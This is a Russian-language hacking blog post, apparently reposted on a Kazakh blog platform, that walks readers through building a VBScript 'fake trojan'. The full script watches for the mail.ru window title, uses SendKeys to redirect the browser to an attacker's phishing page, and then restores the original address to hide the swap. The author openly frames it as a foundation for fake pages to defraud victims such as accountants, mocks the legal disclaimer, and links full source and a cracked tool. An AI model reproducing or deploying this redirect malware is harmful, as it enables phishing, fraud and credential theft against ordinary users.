• 8554
  • 0
  • 1
Нравится блог?
Подписывайтесь!

ФЕйк троян v 2.0 своими руками

Hi all! С вами kazin8 из -=Unlock Team-=, и после некоторого простоя раздела Статьи на нашем www.untm.tk я решил кое что написать) 

Сегодня мы напишем фейк – троян, который будет подменять любую страницу (по нашему желанию)) на любую другую (опять же хозяин – барин)). Писать будем на vbs и как пример будет нами столь любимый www.mail.ru) Для чего это надо? Это будет прекрасным фундаментом для ваших фейков. Может какого нибудь продвинутого банкира вы своим фейком на webmoney и не обманите, а вот бухгалтеры попадутся в легкую))) Начнем, пожалуй. 

1. Инструменты 
Как вы наверное знаете, vbs - это язык сценариев Windows и для него ничего кроме блокнота и прямых рук не нужно. Но мы, я надеюсь, не извращенцы, и будем использовать инструмент под названием primalscript. Посмотрите здесь http://www.crackz.su/patches/419-23-primalscript-2007-enterprise-v4-5-559.html, но если что – у вас всегда есть гугл) Так же нам понадобится немного знать vbs. Сразу говорю статья будет не из коротких. Ленивые могут взять сорс в конце, но хорошо работать он у вас не будет!!! Хоть сначала материал и покажется сложным, статья сугубо для новичков, ибо я сам тот еще новайс) 

2. Алгоритм 
Сам алгоритм будет немного непонятен на словах. Следим за моими словами. Первым делом наш скрипт отслеживает, не зашел ли человек на www.mail.ru? Это делается посредством отлавливания заголовка (он же title). Следующий шаг – передача адресной строке нужного нам адреса, передача клавиши enter, и , наконец, передача строке адреса первоначальной страницы, но уже без перехода на нее. Это для снятия палева. Сразу говорю, фейк далек от идеала, но вы можете добиваться все лучшей и лучшей его настройки. Потом скажу как. 

3. VBS 
Ну что, кто читал мою статью о wsh, тот должен понять почти все, что я буду делать. Но объяснять я все же, буду подробно. Начнем конечно с объявления разных переменных , нужных нам…. 

Option Explicit ‘ Это говорит о разделе переменных. Не дает использовать «левые» переменные 
On Error Resume Next ‘ Пропуск ошибок. Зачем скрытому фейку видимая реакция на ошибки:? 
Dim fso, userdir, wshshell,yes ‘ Объявление нужных переменных 
Set wshshell = WScript.CreateObject("WScript.Shell") ‘ создаем объект для работы с окружением винды, ему мы и будем передавать клавиши 
Set fso = WScript.CreateObject ("Scripting.FileSystemObject") ‘ Объект для работы с файловой системой. 
userdir = WSHShell.ExpandEnvironmentStrings("%userprofile%")’Получаем в userdir адрес текущего юзера винды. 
Opera = userdir+"Application DataOpera" ‘ Получаем путь к директории оперы в Application Data 
FireFox = userdir +"Application DataMozillaFirefox" ‘Получаем путь к директории Огнелиса в Application Data 
yes = 0 ‘ некая логическая переменная) 

Ну а теперь нормальные пояснения. Получение директорий оперы и огнелиса нам нужны для того, чтобы хотя бы приблизительно сказать, каким браузером пользуется жертва. Почему мы определяем не в Program Files? Да потому что каждая версия имеет свое имя папки там) Идем дальше. Что собственно за yes? Эта переменная будет служить нам для определения, есть ли на компе firefox или опера, или они сразу вместе? Или их вообще нет? Так же она поможет сократить конструкцию самого главного алгоритма. Пора переходить к следующему куску кода, который ,собственно, и объяснит переменную yes) 

If FSO.FolderExists(Opera) Or FSO.FolderExists(firefox) Then ‘Если есть опера или лис то 
yes = 1 
Else If FSO.FolderExists(Opera) And FSO.FolderExists(firefox) Then ‘ Если есть и то и другое то 
yes = 2 
End If 
End If 

Поясняю) FSO.FolderExists(DirName) возвращает true когда директория существует и false когда ее нет. Or – оператор или. То есть, если существует только одна директория – оперы или огнелиса, то yes = 1. А если существуют обе директории, то yes = 2. А если их вообще нет, yes так и останется 0. Теперь самый большой кусок. И последний. 

do while 1=1 ‘Цикл пока 1=1 делать…. То есть бесконечно) 
If yes = 1 Or 2 then ‘ Если yes <> 0 можно заменить if yes>0 then 
If WshShell.AppActivate (“@MAIL.RU: почта, новости, работа, рассылки, развлечения. Почта @MAIL.RU - бесплатная почта #1") Then ‘ Если активно окно с mail.ru то 
wshshell.SendKeys "^L" ‘ Горячая клавиша перехода на адресную строку. Ctrl+L 
wshshell.SendKeys "цццюрфлукыгззщкеюкг" ‘Передаем строке www.hakersupport.ru русскими буквами 
wshshell.SendKeys "~" ‘ Символ соответствует нажатию enter 
WScript.Sleep 2000 ‘ Ждем 2 секунды 
wshshell.SendKeys "^L" ‘ На всякий случай опять активизируем адресную строку 
wshshell.SendKeys "цццюьфшдюкг" ‘пишем в ней www.mail.ru русскими буквами 
WScript.Sleep 1000 ‘ Отдыхаем 1 сек. 
wshshell.SendKeys "{ESC}" ‘ Сбрасываем выделение 
End If 
Else ‘ Если yes = 0, то есть в системе только ie (ну или chrome. Его я не стал учитывать) 
If WshShell.AppActivate (“@MAIL.RU: почта, новости, работа, рассылки, развлечения. Почта @MAIL.RU - бесплатная почта #1") Then 
wshshell.SendKeys "^L" 
wshshell.SendKeys " цццюрфлукыгззщкеюкг " 
wshshell.SendKeys "~" 
WScript.Sleep 2000 
wshshell.SendKeys " цццюьфшдюкг " 
WScript.Sleep 1000 
wshshell.SendKeys "{ESC}" 
End If 
End If 
loop 

Мда…. Написано много, а понять не очень получается. Буду разъяснять. Начнем с того момента, когда проверка yes > 0 дает положительный результат, то есть пользуются скорее всего не ie. If WshShell.AppActivate вот эта волшебная функция следит, когда в «строке заголовка программы» появится заданный ей параметр. Но ведь строка заголовка в браузере равна title страницы, заруженной в нем!_) Воспользуемся этим. Title mail.ru всем известен. Идем дальше. Когда мы получили титл, то есть человек загрузил mail мы посылаем браузеру сочетания клавиш Ctrl + L (горячие клавиши для выделения адресной строки)) . Так строку выделили. Теперь надо бы послать нужный нам адрес…. Но… Ведь если человек написал www.mail.ru значит его раскладка стоит на русском. Поэтому русские буквы будут писаться на англ) пользуемся) Написали… Теперь шлем Enter) (символ ~). Теперь подождем пока браузер загрузит подставную страницу…. Теперь на всякий случай повторим выделение строки и напишем там www.mail.ru, опять же русскими буквами…. Так. Теперь хорошо бы снять выделение. Посылаем нажатие клавиши Escape. Вот и все. 
Для ie тоже, но без повторного выделения, ибо ИА не выделяет строку а открывает новое окно для ввода. 

4. Лирическое отступление…. 
Как ты смог заметить…. Фейк далек от идеала… Но все в твоих силах. Сейчас я честно перечислю его проблемы. Во-первых, проблема в том, что ИА самый ублюдский браузер (Извини билли). Он на столько медленный, что когда у мя падает интернет, то я даже этого не замечаю, на столько долго грузит ИА. Если честно, на нем я заразу не тестировал… Ибо у меня его нет))) Прошу всех кто может, попробовать добиться идеального соотношения времени. Во-вторых, в опере есть баг, по крайне мере в 9. Сколько бы раз я ей не передавал Escape, она не хочет снимать выделение. Ну баг не самый страшный. А вот firefox показал себя просто как Медведев в разговоре с Саакашвили) Быстро, четко…. Я рад за огнелиса) 
Ну и наконец, главная просьба. Понимаете, у людей разные скорости подключения и время может быть разным. Прошу вас тестить этот фейк у себя, менять значения Sleep на большие или меньшие, и когда вы добьетесь лучшего результата, пожалуйста напишите в комментах скорость подключения и величину Sleep)))) 
Спасибо всем, кто все же прочитал это бред. С вами был kazin8 -=Unlock Team=- 
Великих вам взломов и удачи! (Помните, 243 статья уголовного кодекса карает создание и распространение вредоносных программ. Статья написана лишь для ознакомления… БЛА БЛА БЛА))). 

Сорс - http://unlock-team.ucoz.ru/load/9-1-0-43

 

Как стать хакером

   
huzrus
3 февраля 2013, 21:45
585

Загрузка...
Loading...

Комментарии

Оставьте свой комментарий

Спасибо за открытие блога в Yvision.kz! Чтобы убедиться в отсутствии спама, все комментарии новых пользователей проходят премодерацию. Соблюдение правил нашей блог-платформы ускорит ваш переход в категорию надежных пользователей, не нуждающихся в премодерации. Обязательно прочтите наши правила по указанной ссылке: Правила

Также можно нажать Ctrl+Enter

Популярные посты

Нет ничего более вдохновляющего, чем видеть стада сайгаков. Не зря их называют «киелі»

Нет ничего более вдохновляющего, чем видеть стада сайгаков. Не зря их называют «киелі»

В начале 2000-х годов в уральской популяции оставалось только 2500 сайгаков. Сейчас благодаря охране от браконьеров их численность выросла до 100 тысяч.
theYakov
17 июля 2017 / 17:55
  • 8255
  • 3
Ресторанный консенсус в Казахстане: мужчина платит всегда

Ресторанный консенсус в Казахстане: мужчина платит всегда

Ресторанный консенсус в этой стране таков, что если речь идет именно о свидании, то оплачивает его на 100% из 100 именно мужчина. Пытаться его расшатать - это достаточно дорогое удовольствие.
convoluted
17 июля 2017 / 15:32
Решили рискнуть и обратиться к риэлторам. И этим людям мы доверяем свой ночлег?

Решили рискнуть и обратиться к риэлторам. И этим людям мы доверяем свой ночлег?

Звоним риэлтору, говорим, верните наши 15 000 тг, так как ваша клиентка нас кинула. По его словам, он вернуть деньги больше не может. Не имеет право.
decorus
17 июля 2017 / 14:48
  • 2830
  • 15
Польша – страна простых решений. Почему они смогли, а мы еще нет?

Польша – страна простых решений. Почему они смогли, а мы еще нет?

В Польше вообще очень много понятного и простого – инфраструктура, коммуникации и дороги прежде всего, льготы в образовании, поляки вообще получают его бесплатно. А урожай побольше нашего.
Shimanskaya
17 июля 2017 / 16:08
  • 3012
  • 37
Тихий фронт. КНБ – это не та контора, которая будет громко афишировать свою деятельность

Тихий фронт. КНБ – это не та контора, которая будет громко афишировать свою деятельность

После тех громких и пугающих событий, которые произошли год назад, всем в Казахстане стало понятно, что от работы спецслужб зависит в нашей жизни действительно многое.
openqazaqstan
14 июля 2017 / 9:55
  • 2393
  • 25
«Язык мой – враг мой», или 7 причин никогда не разговаривать с полицией

«Язык мой – враг мой», или 7 причин никогда не разговаривать с полицией

На этот раз пост очень важный и необходим к прочтению каждым! Не поленитесь и уделите время прочтению. Ни в коем случае, не разговаривайте с полицейскими до прихода вашего адвоката!
asselsabekova
18 июля 2017 / 14:19
  • 2379
  • 30
Хочу сказать работникам ЦОНа «Большое спасибо!». Я бы не хотела работать там

Хочу сказать работникам ЦОНа «Большое спасибо!». Я бы не хотела работать там

Шум, гам, есть люди воспитанные, есть невоспитанные, есть просто дикие люди. Есть и странные люди. В очередях хаос, все друг друга хотят перепрыгнуть, все суют свои бумажки под нос справочному бюро.
decorus
14 июля 2017 / 16:04
  • 2099
  • 15
Госорганы, ответственные за жизни детей, хранят молчание. У них в отчетах все хорошо

Госорганы, ответственные за жизни детей, хранят молчание. У них в отчетах все хорошо

Вчера все информационные агентства страны передали сообщение, которое заставило забиться в ужасе сердца всех матерей страны. В мусорном контейнере города Сатпаев было обнаружено тело новорожденной девочки.
AliyaSadyrbaeva
вчера / 11:06
  • 1851
  • 17
Автостопом по Грузии. Можете себе представить, боржоми льется прямо из трубы!

Автостопом по Грузии. Можете себе представить, боржоми льется прямо из трубы!

Я пытаюсь произнести на грузинском "Дайте, пожалуйста одну лепешку" и протягиваю деньги в окошечко, а дедуля пекарь-продавец на чистом русском говорит: «Да бери-бери, деньги не надо!».
Zario
14 июля 2017 / 22:38
  • 1945
  • 29